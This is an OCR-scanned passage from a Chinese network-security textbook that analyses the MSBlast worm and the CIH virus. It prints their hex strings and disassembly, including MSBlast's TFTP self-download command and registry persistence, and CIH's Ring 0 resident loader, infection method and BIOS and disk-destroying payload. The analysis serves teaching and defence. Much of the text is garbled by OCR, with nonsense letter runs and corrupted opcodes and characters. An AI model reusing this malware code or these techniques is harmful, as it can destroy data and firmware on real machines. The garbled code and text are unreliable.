EJE JEJEJE E EJERE REJE EAE AE REJE EE JEJEJE EJE JEJEJE EJE JEEE JE IEE JEEE EREJE JE EJE EJERE REJE EJE AERE EEEIEE EEEE EE REENER EE 
49 20 6A 75 73 74 20 77 61 6E 74 20 74 6F 20 73 61 79 20 4C 4F 56 45 20 59 4F 55 20 53 41 4E 21 21 
00 62 69 6C 6C 79 20 67 61 74 65 73 20 77 68 79 20 64 6F 20 79 6F 75 20 6D 61 6B 65 20 74 68 69 73 
20 70 6F 73 73 69 62 6C 65 20 3F 20 53 74 6F 70 20 6D 61 6B 69 6E 67 20 6D 6F 6E 65 79 20 61 6E 64 
20 66 69 78 20 79 6F 75 72 20 73 6F 66 74 77 61 72 65 21 21 00 

* 利用 Winhex 查看 十 六 进 制 ,发 现 偏 移 为 00001a40 的 十 六 进 制 的 ASCII 转 换 为 明文 为 : 

I just want to say LOVE YOU SAN !! billy gates why do you make this possible ? Stop making money 
and fix your software !! 

EESE RE IE AE REEE EAE RE EEEE NE AEREE EEEE SE ICE EIE XO SEEE EAEE NE E EEEE E OCIO KOC XO XO Xo eee 

77 69 6E 64 6F 77 73 75 70 64 61 74 65 2E 63 6F 6D 

* 利用 Winhex 查看 十 六 进 制 ,发 现 偏 移 为 000021E0 的 十 六 进 制 的 ASCII 转 换 为 明文 为 : 


Windows update. com 


How 


JSAEERAPGUGK 


网 络 安 会 与 信息 保障 


m"————————————————————————————— BÀ 
73 74 61 72 74 20 25 73 0A 00 74 66 74 70 20 2D 69 20 25 73 20 47 45 54 20 25 73 

* 利用 Winhex 查看 十 六 进 制 . 发 现 偏 移 为 00002200 的 十 六 进 制 ,其 中 %s 为 变量 . ASCII 转换 为 明 
文 为 : 

start $s tftp-i SsGETS%Ss 
m————————— AEE AEE AEE NEDENE AERE KEREKERE KERE NEREK AE AE AE AEE AE AE AE E AE AEAEE AEAEE E 


77 69 6E 64 6F 77 73 20 61 75 74 6F 20 75 70 64 61 74 65 00 53 4F 46 54 57 41 52 45 5C 4D 69 63 72 
6F 73 6F 66 74 5C 57 69 6E 64 6F 77 73 5C 43 75 72 72 65 6E 74 56 65 72 73 69 6F 6E 5C 52 75 6E 

* 利用 Winhex 查 看 十 六 进 制 .发现 偏 移 为 00002250 的 十 六 进 制 的 ASCII 转换 为 明文 为 : 

Windows auto update SOFTWARE\Microsof t\Windows\CurrentVersion\Run 
JOCOHOOOOUOUOUOEROOOOUOUOOEOHOHOHEHHEOOOOOOOOOOOOHOUOUOOHOOOOUOOOOOOOUOHR 


6.4.4 病毒 跟踪 


运行 MSBlast. exe 病毒 之 后 ,利用 Regshot 监视 注册 表 发 现 新 增 1 处 键 值 , 键 值 为 
MSBlast. exe。 在 运行 的 时 候 将 MSBlast. exe WE C 盘 目录 下 ,然后 写 键 值 仍 为 MSBlast. 
exe, 下 次 开机 MSBlast. exe 则 不 会 自动 运行 。 说 明 作 者 编写 病毒 时 候 键 值 并 不 是 写 人 exe 
当前 文件 路 径 ,而 是 指向 System32 目录 下 。 在 测试 过 程 中 是 这 样 的 情况 。 而 被 感染 病毒 
之 后 ,MSBlast. exe 文件 都 复制 到 对 方 的 System32 目录 下 ,每 次 开机 都 会 运行 。 


OX AE E DEJE JE HE FE DE E DE PEJE PE PEPEPEPE FE FE X XCCXCXEXCXCXCXEXEXECICICICICXCXEXCXCXEXCXCICICICXCXE XXE IE AE DE EREA IE MEAE EEFE FE EIERE REEK Ge 


增加 值 : 1 
HKEY LOCAL MACHINEXSOFTWAREMMicrosoftVWindowsVCurrentVersionVRunMWindows auto update: 6D 73 
62 6C 61 73 74 2E 65 78 65 00 49 20 6A 75 73 74 20 77 61 6E 74 20 74 6F 20 73 61 79 20 4C 4F 56 45 
20 59 4F 55 20 53 41 4E 21 21 00 62 69 6C 6C 


JOOOOOODOOOHOIOHOOOOOOHOOOHOOOOOOOHOHOHOOOOHO]OHO|OH(OHOH]Odedadad|egeeeoeeede Ja £T 


病毒 创建 Mutex 内 核对 象 ,病毒 软件 随机 打开 本 地 端口 开始 向 外 部 IP 发 出 20 个 SYN 
扫描 连接 ,目标 主机 IP 地 址 由 病毒 程序 随机 产生 。 


PE E RE JEJE AE DE DEJE JE AE FE E FE FEJE IE AE JEPE IE AE FE X JEPE IE AE JE PE IE IE FE FE E JEJE IE IE XE JEFE IE FE FE E JEJEJE IE X XC FEIE MEAE IE EEIEIEE C X XC ICI oe dee 


TCP 192. 168. 0.23: 4608 27.185.154.157: 135 SYN SENT 


TCP 192.168.0.23: 4609 27.185.154.158: 135 SYN SENT 
TCP 192.168.0.23: 4610 27.185.154.159: 135 SYN SENT 
TCP 192.168.0.23: 4611 27.185.154.160: 135 SYN SENT 
TCP 192.168.0.23: 4612 27.185.154.161: 135 SYN SENT 
TCP 192.168.0.23: 4613 27.185.154.162: 135 SYN SENT 
TCP 192.168.0.23: 4614 27.185.154.163: 135 SYN SENT 
TCP 192.168.0.23: 4615 27.185.154.164: 135 SYN SENT 
TCP 192.168.0.23: 4616 27.185.154.165: 135 SYN SENT 
TCP 192.168.0.23: 4617 27.185.154.166: 135 SYN SENT 
TCP 192.168.0.23: 4618 27.185.154.167: 135 SYN SENT 
TCP 192.168.0.23: 4619 27.185.154.168: 135 SYN SENT 
TCP 192.168.0.23: 4620 27.185.154.169: 135 SYN SENT 
TCP 192.168.0.23: 4621 27.185.154.170: 135 SYN SENT 
TCP 192.168.0.23: 4622 27.185.154.171: 135 SYN SENT 
TCP 192.168.0.23: 4623 27.185.154.172: 135 SYN SENT 
TCP 192.168.0.23: 4624 27.185.154.173: 135 SYN SENT 
TCP 192.168.0.23: 4625 27.185.154.174: 135 SYN SENT 


TCP 192.168.0.23: 4626 27.185.154.175: 135 SYN SENT 
TCP 192.168.0.23: 4627 27.185.154.176: 135 SYN SENT 


E E E AEAEE DE JEJERE AEE E E FEREYE AE FEAE AE AE E E FE AEAEE FE FEE AE E E E SE FEE AEE FEFE AE AE AE E EDEYE YEYE AE PEIEE AE E E EEEE E EEA EE EEEE EEE 


病毒 反 汇 编 代 码 中 有 一 段 代 码 是 : tftp -i %s GET %s, 此 段 代 码 用 来 下 载 病毒 。 默 认 
情况 下 TFTP 服务 器 开启 的 端口 为 UDP 69, 如 果 病 毒 程序 溢出 目标 主机 成 功 之 后 会 绑 定 
目标 主机 一 个 4444 的 端口 ,然后 发 送 下 载 消息 ,目标 主机 通过 TFTP 下 载 病毒 再 运行 病 
毒 。 反 复 循环 导致 更 多 的 计算 机 受到 感染 。 攻 击 失 败 之 后 RPC 服务 会 停止 ,文件 复制 粘贴 
功能 失效 ,COM 十 属性 页 无 法 显示 。 也 有 可 能 会 造成 Svchost. exe 进程 被 关闭 ,导致 计算 机 
重新 启动 。 


6.4.5 深入 分 析 


1. 利用 W32dsm 反 汇 编 脱 壳 后 的 MSBlast. exe, 阅 读 其 汇编 代码 ,发 现汇 编 代 码 中 包 
含 病毒 写 人 注册 表 键 值 的 动作 。 


DC DE DE JE PEEKE JEJE PEENE NENE DE JEJE AEE AEAEE AE EAEE NEREA AEAEE AEE AE EEE EEEE AEAEE AEE AEAEE EEIEIE AE EEEIEE E AEREE AEAEE EEEE EEE 
* Referenced by a CALL at Address: 

| : 004022B0 

| 

: 00401250 55 push ebp 

: 00401251 89E5 mov ebp, esp 

: 00401253 81ECACO30000 sub esp, 000003AC 

: 00401259 56 push esi 

: 0040125A 57 push edi 

: 0040125B 31F6 xor esi,esi 

: 0040125D 6A00 push 00000000 

: 0040125F 8D45F8 lea eax, dword ptr [ebp-08] 

: 00401262 50 push eax 

: 00401263 6A00 push 00000000 

: 00401265 683F000F00 push 000F003F 

: 0040126A 6A00 push 00000000 

: 0040126C 6A00 push 00000000 

: 0040126E 6A00 push 00000000 

* Possible StringData Ref from Data Obj —>"SOFTWARE\Microsoft\Windows\CurrentVersion\ Run" // 
写 人 自 启动 项 

| 

: 00401270 685D484000 push 0040485D 

: 00401275 6802000080 push 80000002 

* Reference To: ADVAPI32.RegCreateKeyExA, Ord: 0000h // 打 开 注册 表 主 目录 
| 

: 0040127A E80D110000 Call 0040238C 

: 0040127F 6A32 push 00000032 

* Possible StringData Ref from Data Obj —"nsblast. exe" // 键 值 数据 
| 

: 00401281 683C404000 push 0040403C 

: 00401286 6A01 push 00000001 

: 00401288 6A00 push 00000000 

* Possible StringData Ref from Data Obj —"Windows auto update" // 键 值 名 称 


涤 素 防护 投 太 


How 


网 经 安全 与 信息 保障 


| 

: 0040128A 6849484000 push 00404849 

: 0040128F FF75F8 push [ ebp-08] 

* Reference To: ADVAPI32.RegSetValueExA, Ord: 0000h // 写 注册 表 项 
| 

: 00401292 E801110000 Call 00402398 

: 00401297 FF75F8 push [ebp-08] 

* Reference To: ADVAPI32.RegCloseKey,Ord: 0000h // 关 闭 注册 表 
| 

: 0040129A E8E1100000 Call 00402380 


2. 病毒 向 目标 主机 发 动 溢 出 攻击 的 反 汇编 代码 , 因 汇 编 代码 较 多 不 能 全 部 列 出 。 


* Reference To: WS2 32. sendto, Ord: 0000h // 发 送 
| 

: 004016AC E8FB0A0000 Call 004021AC 

: 004016B1 83F801 cmp eax, 00000001 

: 004016B4 7C22 jl 004016D8 

: 004016B6 6884030000 push 00000384 


* Reference To: WS2 32. send, Ord: 0000h // 发 送 
| 

: 00401B6D E82E060000 Call 004021A0 

: 00401B72 83F8FF cmp eax, FFFFFFFF 

: 00401B75 O0F84C0020000 je 00401E3B 

: 00401B7B 6A00 push 00000000 

: 00401B7D FFBSFCEFFFFF push dword ptr [ebp + FFFFEFFC] 

: 00401B83 8D8500FOFFFF lea eax, dword ptr [ebp + FFFFF000] 
: 00401B89 50 push eax 

: 00401B8A FF7508 push [ebp + 08] 

* Reference To: WS2 32. send, Ord: 0000h // 3X 

| 

: 00401B8D E80E060000 Call 004021A0 

: 00401B92 83F8FF cmp eax, FFFFFFFF 

: 00401B95 0F84A0020000 je 00401E3B 

: 00401B9B FF7508 push [ebp * 08] 


* Reference To: WS2 32. send, Ord: 0000h // 发 送 
| 

: 00401D21 E87A040000 Call 0040210 

: 00401D26 83F801 cmp eax, 00000001 

: 00401D29 OFBCBCO00000 jl 00401DEB 

: 00401D2F 68E8030000 push 00000358 


* Reference To: WS2 32. send, Ord: 0000h // 发 送 
| 

: 004021A0 FF25E0514000 Jmp dword ptr [004051E0] 

: 004021A6 90 nop 

: 004021A7 90 nop 

: 004021A8 00000000 BYTE 4 DUP(0) 


* Reference To: KERNEL32.CreateMutexA, Ord: 0000h // 创 建 Mutex 内 核对 象 


| 

: 00402350 FF2554524000 Jmp dword ptr [00405254] 
: 00402356 90 nop 

: 00402357 90 nop 

: 00402358 00000000 BYTE 4 DUP(0) 


* 因 病 毒 利用 多 线程 技术 , 反 汇 编 代 码 中 包含 较 多 Send 代码 ,不 能 全 部 列 出 。 但 Call 


地 址 全 部 是 004021A0。 


3. 病毒 如 果 溢 出 成 功 将 向 目标 主机 TCP/4444 端口 发 送 下 载 病 毒 自 身 的 消息 ,本 机 开 


Ji UDP/69 端口 提供 TFTP 服务 。 用 来 感染 更 多 的 计算 机 。 


* Possible StringData Ref from Data Obj ->"%i.g%i.%i.g%inV/ 目 标 主机 IP 地 址 
| 

: 00401803 682B484000 push 0040482B 

: 00401808 6800304000 push 00403000 


* Possible StringData Ref from Data Obj —"nsblast. exe" // 程 序 文件 名 称 
| 

: 00401CE3 683C404000 push 0040403C 

: 00401CE8 6800304000 push 00403000 


* Possible StringData Ref from Data Obj —"tftp-i & s GET & s // 发 送 消息 下 载 病毒 


" 


| 

: 00401CED 680C484000 push 0040480C 

: 00401CF2 8D85FCEDFFFF lea eax, dword ptr [ebp + FFFFEDFC] 
: 00401CF8 50 push eax 


4. 从 汇编 代码 中 分 析 病 毒 判 断 系 统 日 期 是 否 为 16 日 ,就 会 向 微软 Windows update. com 


发 动 DDoS 攻击 。 


* Reference To: KERNEL32. GetDateFormatA, Ord: 0000h // 枚 取 时 间 格 式 
| 

: 00401510 E8E70D0000 Call 004022FC 

: 00401515 6A03 push 00000003 

: 00401517 8D45F0 lea eax, dword ptr [ebp-10] 

: 0040151A 50 push eax 

* Possible StringData Ref from Data Obj —"Md." 

| 

: 0040151B 683A484000 push 0040483A 

: 00401520 6A00 push 00000000 

: 00401522 6A00 push 00000000 

: 00401524 6809040000 push 00000409 

* Reference To: KERNEL32.GetDateFormatA,Ord: 0000h // 枚 取 时 间 格 式 
| 

: 00401529 E8CE0D0000 Call 004022FC 

: 0040152E 8D45F4 lea eax, dword ptr [ebp-0C] 

: 00401531 50 push eax 


* Reference To: KERNEL32.GetDateFormatA,Ord: 0000h // 枚 取 时 间 格 式 


ASSEEGPRCK 


HoR 


网 络 安 会 与 信息 保障 


: 004022FC FF2538524000 Jmp dword ptr [00405238] 
: 00402302 90 nop 

: 00402303 90 nop 

: 00402304 00000000 BYTE 4 DUP(0) 


* Reference To: WININET. InternetGetConnectedState, Ord: 0000h // Windows update. com 
| 

: 0040131B E8280F0000 Call 00402248 

: 00401320 09C0 or eax, eax 

: 00401322 750C jne 00401330 

: 00401324 68204E0000 push 00004E20 


* Referenced by a CALL at Address: 

| : 0040131B 

| 

* Reference To: WININET. InternetGetConnectedState, Ord: 0000h 
| 

: 00402248 FF2520524000 Jmp dword ptr [00405220] 

: 0040224E 90 nop 

: 0040224F 90 nop 

: 00402250 00000000 BYTE 4 DUP(0) 


* Reference To: WS2 32.connect, Ord: 0000h 


| 

: 0040183B E8D8090000 Call 00402218 
: 00401840 47 inc edi 

: 00401841 83FF14 cmp edi, 00000014 

: 00401844 7CA0 jl 004017E6 

: 00401846 6808070000 push 00000708 


* Reference To: WS2 32.connect, Ord: 0000h 

| 

: 00402218 FF2508524000 Jmp dword ptr [00405208] 
: 0040221E 90 nop 

: 0040221F 90 nop 

: 00402220 00000000 BYTE 4 DUP(0) 


6.5 单机 CIH 病毒 特征 分 析 


CIH 病毒 属 文件 型 病毒 ,其 别名 有 Win95. CIH, Spacefiller, Win32. CIH, PE_CIH, € 
主要 感染 Windows 95/98 下 的 可 执行 文件 (PE 格式 , Portable Executable Format) ,目前 的 
版 本 不 感染 DOS. 以 及 WIN 3. XCNE 格式 ,Windows and OS/2 Windows 3. 1 execution File 
Format) 下 的 可 执行 文件 ,并且 在 Windows NT :X Windows 2000 中 无 效 。 其 发 展 过 程 经 历 
了 vl.0.vl.1.vl1.2、v1.3、v1.4 总 共 5 个 版 本 ,目前 最 流行 的 是 v1. 2 版 本 。 

本 次 实验 将 结合 病毒 代码 对 CIH 病毒 进行 剖析 。 因 为 CIH 病毒 可 能 会 改写 主板 
BIOS ,造成 无 可 挽回 的 损失 ,所 以 病毒 的 安装 由 教师 实施 ,而 学 生 必 须 分 析 与 理解 病毒 


特征 。 

1. 病毒 的 危害 及 传染 途径 

病毒 的 危害 主要 表现 于 病毒 发 作 后 ,硬盘 数据 全 部 丢失 ,其 至 主板 上 的 BIOS 中 的 原 内 
容 被 彻底 破坏 ,主机 无 法 启动 。 只 有 更 换 BIOS, 或 是 向 固定 在 主板 上 的 BIOS 中 重新 写 人 
原来 版 本 的 程序 ,才能 解决 问题 。 

该 病毒 是 通过 文件 进行 传播 。 计 算 机 开机 以 后 ,如 果 运 行 了 带 病毒 的 文件 ,其 病毒 就 驻 
留 在 Windows 的 系统 内 存 中 。 此 后 ,只 要 运行 了 PE 格式 的 . exe 文件 ,这 些 文件 就 会 感染 
上 该 病毒 。 

2. 病毒 的 运行 机 制 

CIHv 只 有 1000 多 个 字 节 。 它 不 但 绕 过 了 微软 提供 的 应 用 程序 界面 ,还 绕 过 了 
ActiveX .C++ 甚至 CC, 使 用 汇编 ,利用 V xD (虚拟 设备 驱动 程序 ) 接 口 编程 ,直接 进入 
Windows 内 核 。 它 没有 改变 宿主 文件 的 大 小 ,而 是 采用 了 一 种 新 的 文件 感染 机 制 即 碎 洞 攻 
击 (Fragmented Cavity Attack) ,将 病毒 化 整 为 零 , 拆 分 成 若干 块 ,插入 宿主 文件 中 ; 它 利用 
目前 许多 BIOS 芯片 开放 了 可 重 写 的 特性 ,向 计算 机 主板 的 BIOS 端口 写 入 乱码 ,开创 了 病 
毒 直接 进攻 计算 机 主板 芯片 的 先例 。 

3. CIH 病毒 的 驻 留 (初始 化 ) 

CIH 病毒 是 通过 Windows 9x 的 异常 处 理 机 制 进入 系统 。 在 应 用 程序 下 故意 产生 一 个 
异常 ,并 修改 IDT 表 中 的 处 理 程序 地 址 ,使 其 指向 病毒 代码 ,再 显 式 进入 此 异常 (主要 为 直 
接 调 用 INT 3 中 断 )。 就 可 以 申请 系统 共享 内 存 将 病毒 驻 留 。 当 运行 带 有 该 病毒 的 . exe 
时 ,由 于 该 病毒 修改 了 该 文件 程序 的 入 口 地 址 (Address of EntryPoint), 调 入 内 存 执行 病毒 
的 驻 留 程序 。 

在 Windows 9x 中 ,应 用 程序 在 内 存 都 是 在 4MB 一 2GB 内 ,开始 地 址 为 0x400000 基地 
址 再 加 上 相对 地 址 RVA 即 为 程序 开始 地 址 。 

CIH 首先 执行 的 是 : 

55 push ebp 

8d4424f8 lea eax [esp-8] 


3308 xor ebx, ebx 
648703 xchg eax, fs: [ebx] 


将 这 些 数值 作为 特征 码 搜索 即 可 查 出 CIH 病毒 。 

有 关 驻 留 程序 长 度 为 184 字 节 ,其 驻 留 主 要 过 程 如 下 。 

(D 用 SIDT 指令 取得 IDT base address( 中 断 描述 符 表 基地 址 ) .然后 把 IDT 的 INT 3 
的 入 口 地 址 改 为 指向 CIH 自己 的 INT 3 程序 入 口 部 分 。 

(2) 执行 INT 3 指令 ,进入 CIH 自身 的 INT 3 入 口 程序 ,这 样 ,CIH 病毒 就 可 以 获得 
Windows 最 高 级 别 的 权限 (Ring 0 级 ) ,可 在 Windows 的 内 核 执行 各 种 操作 (如 终止 系统 运 
行 ,直接 对 内 存 读 写 .截获 各 种 中 断 .控制 L/O 端口 等 ,这 些 操作 在 应 用 程序 层 Ring 3 级 是 
受到 严格 限制 的 ) 。 病 毒 在 这 段 程序 中 首先 检查 调试 寄存 器 DRO 的 值 是 否 为 0, 用 以 判断 
先前 是 否 有 CIH 病毒 已 经 驻 留 。 

(3) 如 果 DRO 的 值 不 为 0, 则 表示 CIH 病毒 程序 已 驻 留 ,病毒 程序 恢复 原先 的 INT 3 
和 人口 ,然后 正常 退出 INT 3, 跳 到 过 程 (9)。 
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(4) 如 果 DRO 值 为 0, 则 CIH 病毒 将 尝试 进行 驻 留 。 首 先 将 当前 EBX 寄存 器 的 值 赋 
给 DRO 寄存 器 ,以 生成 驻 留 标记 ,然后 调用 INT 20 中 断 ,使 用 VxD call Page Allocate 系统 
调用 ,请 求 系统 分 配 2 个 PAGE 大 小 的 Windows 系统 内 存 (system memory), Windows 系 
统 内 存 地 址 范围 为 C0000000h~FFFFFFFFh, 它 是 用 来 存放 所 有 的 虚拟 驱动 程序 的 内 存 区 
域 ,如 果 程 序 想 长 期 驻 留 在 内 存 中 , 则 必须 申请 到 此 区 段 内 的 内 存 。 

(5) 如 果 内 存 申请 成 功 , 则 从 被 感染 文件 中 将 原先 分 成 多 块 的 病毒 代码 收集 起 来 ,并 进 
行 组 合 后 放 到 申请 到 的 内 存 空间 中 。 

(6) 再 次 调用 INT 3 中 断 进入 CIH 病毒 体 的 INT 3 入 口 程 序 , 调 用 INT 20 来 完成 调 
用 一 个 IFSMgr_InstallFileSystemApiHook 的 子 程 序 , 在 Windows 内 核 中 文件 系统 处 理 也 
数 中 挂 接 钩子 ,以 截取 文件 调用 的 操作 ,这样 一 旦 系统 出 现 要求 开 启 文件 的 调用 , 则 CIH 病 
毒 的 传染 部 分 程序 就 会 在 第 一 时 间 截 获 此 文件 。 

CD 将 同时 获取 的 Windows 默认 的 下 SMgr_Ring0_FileIO( 核 心 文件 输入 /输出 ) 服 务 
程序 的 入 口 地 址 保留 在 DRO 寄存 器 中 ,以 便于 CIH 病毒 调用 。 

(8) 恢复 原先 的 IDT 中 断 表 中 的 INT 3 入 口 ,退出 INT 3。 

(9) 根据 病毒 程序 内 隐藏 的 原文 件 的 正常 入 口 地 址 , 跳 到 原文 件 正常 入 口 ,执行 正常 
程序 。 

驻 留 程序 代码 如 下 : 


00401000 push ebp; 病毒 代码 入 口 (Ring 3 级 ) 
lea eax, [esp- 08]; [esp- 08] = 当前 代码 段 
xor ebx,ebx; 段 寄 存 器 FS: [0] 处 是 当前 堆栈 
xchg eax, fs: [ebx] 

call 0040100f 

0040100f pop ebx 

lea ecx, [ebx+ 42] 

push ecx 

push eax 

push eax 

sidt fword ptr [esp- 2] 

pop ebx 

add ebx, 1c 

cli 

mov ebp, [ebx] 

mov bp,[bx - 4] 

lea esi, [ecx + 12] 

push esi 

mov [ebx - 4], si 

shr esi,10h 

mov [ebx + 2], si 

pop esi 

int 3 

push esi 

mov esi, eax 

0040103a mov ecx, [eax - 4] 

repz movsb 

sub eax, 8 


mov esi,[eax] 

or esi,esi 

jz 0040104a 

jmp 0040103a 

0040104a pop esi 

int 3 

sti 

xor ebx, ebx 

jmp 00401058 

00401051 xor ebx, ebx 
mov eax,fs: [ebx] 

mov esp, [eax] 

00401058 pop dword ptr fs: [ebx] 
pop eax 

pop ebp 

push 

ret 

jz 004010097 

mov ecx, dr0 

jecxz 0040107a 

add dword ptr [esp], 15h 
0040106e mov [ebx - 4], bp 
shr ebp, 10h 

mov [ebx+ 2], bp 

iretd 

0040107a mov dr0, ebx 
push 0f 

push ecx 

push ff 

push ecx 

push ecx 

push ecx 

push 1 

push2 

int 20h; 调用 VxD 服务 ,分 配 页 面 
add esp, 20h 

xchg eax, edi 

lea eax, [esi- 63] 

iretd 

00401097 1ea [edi- 309] 
push eax 

int 20h; 调用 VxD 服务 ,安装 中 断 钩子 . 
mov dr0, eax 

pop eax 

mov ecx, [esp * 3d] 

mov edx, [ecx] 

mov [eax - 4], edx 

lea eax, [eax- 2a] 

mov [ecx], eax 

cli 

jmp 0040106e 
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4. 病毒 的 感染 

CIH 病毒 的 传染 部 分 实际 上 是 病毒 在 驻 留 内 存 过 程 中 调用 Windows 内 核 底 层 函 数 
IFSMgr InstallFileSystemApiHook 挂 接 钧 子 时 指针 指示 的 那 段 程序 。 这 段 程 序 共 586 字 
节 , 感 染 过 程 如 下 : 

(1) 文件 的 截获 

每 当 系统 出 现 要 求 开启 文件 的 调用 时 , 驻 留 内 存 的 CIH 病毒 就 截获 该 文件 。 病 毒 调用 
INT 20 的 VxD call UniToBCSPath 系统 功能 调用 取 回 该 文件 名 和 路 径 。 

(2) EXE 文件 的 判断 

对 该 文件 名 进行 分 析 , 若 文件 扩展 名 不 为 “. exe”, 不 传染 ,离开 病毒 程序 , 跳 回 到 
Windows 内 核 的 正常 文件 处 理 程序 上 。 

(3) PE 格式 . exe 判别 

PE 格式 文件 由 文件 头 和 代码 区 (. text Section) .数据 区 (. data Section)、 只 读数 据 区 
C. rdata Section) ,资源 信息 区 (. rsrc Section) 等 文件 实体 部 分 组 成 。 其 中 文件 头 又 由 
MS-DOS MZ 3; ,MS-DOS 实 模式 短程 序 .PE 文件 标识 (Signature)、PE 文件 头 、PE 文件 可 
选 头 以 及 各 个 Sections 头 组 成 。CIH 病毒 感 当 的 就 是 PE 格式 的 可 执行 文件 。 

当 病 毒 确认 该 文件 是 . exe 文件 后 , 打开 该 文件 ,取出 该 文件 的 PE 文件 标识 符 
(Signature) ,进行 分 析 , 若 Signature "00455000" (00PEO00) , W 2: B] Z Sc (FE PE 格式 的 可 
执行 文件 , 且 尚 未 感染 , 跳 到 过 程 (4) ,对 其 感染 ; 否则 ,认为 是 已 感染 的 PE 格式 文件 或 该 文 
件 是 其 他 格式 的 可 执行 文件 ,如 MS-DOS 或 Windows 3. X NE 格式 ,不 进行 感染 ,而 直接 跳 
到 病毒 发 作 模块 上 执行 。 

(4) 病毒 首 块 的 寄生 计算 

CIH 病毒 利用 了 PE 格式 文件 的 文件 头 和 各 个 区 都 可 能 存在 自由 空间 碎片 这 一 特性 ， 
将 病毒 程序 拆 成 若干 不 等 的 块 ,见缝插针 , 持 到 感染 文件 的 不 同 区 内 。CIH 病毒 的 首 块 程 
序 是 插 在 PE 文件 头 的 自由 空间 内 的 。 病 毒 首先 从 文件 的 第 134 字 节 处 读 入 82 个 字 节 ,这 
82 个 字 节 包含 了 该 文件 的 程序 人 口 地 址 ,文件 的 分 区 数 ,第 一 个 Section Header 首 地 址 以 
及 整个 文件 头 大 小 (Size of Headers ^ MS header 十 PE file header 十 PE optional header 十 PE 
section headers 十 自由 空间 ) 等 参数 。 

(5) 病毒 其 余 块 的 寄生 计算 

剩余 的 病毒 代码 是 分 块 依次 插入 到 各 Section 中 的 自由 空间 里 的 。 

要 确定 该 区 是 否 有 自由 空间 ,可 通过 查看 Section Header 中 的 参数 确定 。Section 
Headers 区 域 是 紧 跟 在 PE Optional Header 区 域 后 面 。 每 个 Section Header 共 占 40 个 字 
节 , 由 Name( 区 名 ) 、VirtSize( 本 已 使 用 大 小 )、RVA( 本 区 的 虚拟 地 址 ) .PhysSize( 区 物理 大 
小 )、Phys off( 本 区 在 文件 中 的 偏 移 量 ) 和 Flags( 标 志 ) 组 成 。 其 结构 如 下 : 

typedef struct IMAGE SECTION HEADER { 

UCHAR Name[ 8]; 

ULONG VirtSize; 

ULONG RVA; 

ULONG PhysSize; 


ULONG Pyus off; 
ULONG PointerToRelocations; 


ULONG PointerToLinenumbers; 
USHORT NumberOfRelocations; 
USHORT NumberOfLinenumbers; 
ULONG Flags; 
) IMAGE SECTION HEADER 
病毒 将 整个 Section Headers 读 入 内 存 , 取 第 一 个 Section Header ,计算 出 该 Section 的 
自由 空间 (PhysSize 一 VirtSize) ,以 确定 可 存放 到 该 区 的 病毒 块 字 节 数 ; 计算 出 病毒 块 在 该 
区 的 物理 存放 位 置 (Physoff 十 VirtSize); 计算 出 病毒 块 在 该 文件 的 逻辑 存放 位 置 (VirtSize 十 
RVA 十 ImageBase); 修改 VirtSize( 该 块 病毒 长 度 十 原 VirtSize); 修改 Flags, 置 该 区 为 已 初 
始 化 数据 区 和 可 读 标志 ; 将 该 区 的 病毒 块 长 度 和 逻辑 指针 参数 写 人 病毒 链表 指针 区 相应 区 
W: 求 出 病毒 剩余 长 度 ,并 取 下 一 个 Section Header。 反 复 前 面 的 操作 ,直到 病毒 全 部 放 入 
为 止 。 
(6) 写 人 病毒 
病毒 程序 在 前 面 只 是 计算 出 了 病毒 的 分 块 、 长 度 和 插入 到 文件 的 位 置 等 参数 ,将 这 些 参 
数 用 PUSH 指令 压 和 人 栈 中 。 在 计算 完 所 有 病毒 存放 位 置 后 , 才 从 栈 中 POP 出 进行 写 盘 
操作 。 
病毒 读 入 文件 和 写 入 文件 都 是 通过 调用 系统 内 核 的 IFSMgr_Ring0_FileIO 的 读 
(EAX —0000D600) #5 (EAX —0000D601)3J] f£ Sz ELIT o 
5. 病毒 的 发 作 
CD 病毒 发 作 条 件 判断 
JE CIHv1. 4 中 ,病毒 的 发 作 日 期 是 4 月 26 日 ,病毒 从 COMS 的 70.71 端口 取出 系统 当 
前 日 期 ,对 其 进行 判断 : 
MOV AX,0708 
OUT 70, AL 
IN AL,71 取 当 前 系统 月 份 一 AL 
XCHG AL, AH 
OUT 70, AL 
IN AL,71 取 当 前 系统 日 -2 
XOR AX, 0426 是 否 为 4 月 26 H 
JZ 病毒 发 作 程序 
如 果 系 统 当前 日 期 不 是 4 月 26 日 , 则 离开 病毒 程序 , 回 到 文件 的 原 正常 操作 上 ; 若 正 
好 是 4 月 26 日 , 则 疯狂 的 CIH 病毒 破坏 开始 了 。 
(2) 病毒 的 破坏 
CD 通过 主板 的 BIOS 端口 地 址 0CFEH 和 0CFDH 向 BIOS 引导 块 (Boot Block) 内 各 写 
入 一 个 字 节 的 乱码 ,造成 主机 无 法 启动 。 
[OE 覆盖 硬盘 
通过 调用 V xd call IOS_SendCommand 直接 对 硬盘 进行 存 取 ,将 垃圾 代码 以 2048 S 
区 为 单位 ,从 硬盘 主 引 导 区 开始 依次 循环 写 人 硬盘 ,直到 所 有 硬盘 ( 含 逻 辑 盘 ) 的 数据 均 被 破 
坏 为 止 。 
CIH 病毒 先 构造 一 个 IOR ,再 使 用 IOS_SendCommand 调用 ,完成 IOR 所 指定 的 功能 。 
病毒 在 IOR 中 的 IOR_flags 中 指示 要 写 的 设备 为 物理 设备 (IORF_PHYS_CMD) ,同步 调用 
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(IORF_SYNC_COMMAND) , 即 在 写 操作 完成 之 后 才 返回 。 然 后 指定 第 一 次 写 的 位 置 为 
OCIOR start. a ddr[2]Ep 0 柱 面 0 面 0 扇 区 , 即 主 引导 区 ) ,每 次 写 和 人 2048 个 字 节 (IOR_xfer_ 

count) ,第 一 次 为 物理 硬盘 (IOR _vol_ designtr = 80h), 需 要 写 人 的 东西 放 在 内 存 
e r ptr) ,这 个 地 址 是 无 所 谓 的 ,目的 只 是 要 随便 写 一 大 串 无 关 数据 到 
硬盘 上 ,只 要 该 地 址 不 是 指向 不 存在 的 内 存 空间 即 可 。 最 后 CIH 调用 IOS_SendCommand， 
完成 一 次 写 操作 。 操 作 完 成 后 , 先 判 断 状态 (IOR_status) ,看 该 设备 是 否 正常 ,若是 , 则 每 次 
2048 字 节 的 一 直 写 下 去 。 如 果 写 完 一 个 硬盘 (不 太 可 能 ) 或 出 错 则 把 IOR_vol_designtr 十 1 
指向 下 一 个 物理 硬盘 。 

程序 注释 如 下 : 


; 0001 为 写 功 能 IOR_WRITE 
40000501h 为 IOR_flags = 1000000000000000000010100000001 
; IORF PHYS CMD|IORF VERSION 002|IORF SYNC COMMAND|IORF HIGH PRIORITY 
IORF PHYS CMD 指示 为 物理 设备 
